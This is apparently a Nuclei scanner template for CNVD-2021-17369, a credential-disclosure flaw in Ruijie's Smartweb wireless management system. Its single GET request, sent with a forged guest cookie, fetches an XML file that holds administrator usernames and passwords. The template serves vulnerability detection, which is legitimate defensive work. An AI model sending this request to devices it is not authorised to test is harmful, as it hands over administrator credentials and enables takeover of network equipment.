id: CNVD-2021-17369
info:
  name: Ruijie Smartweb Management System Password Information Disclosure
  author: pikpikcu
  severity: high
  description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
  tags: ruijie,disclosure,cnvd,cnvd2021
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
requests:
  - method: GET
    path:
      - "{{BaseURL}}/web/xml/webuser-auth.xml"
    headers:
      Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<userauth>"
          - "<password>"
        condition: and
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/16
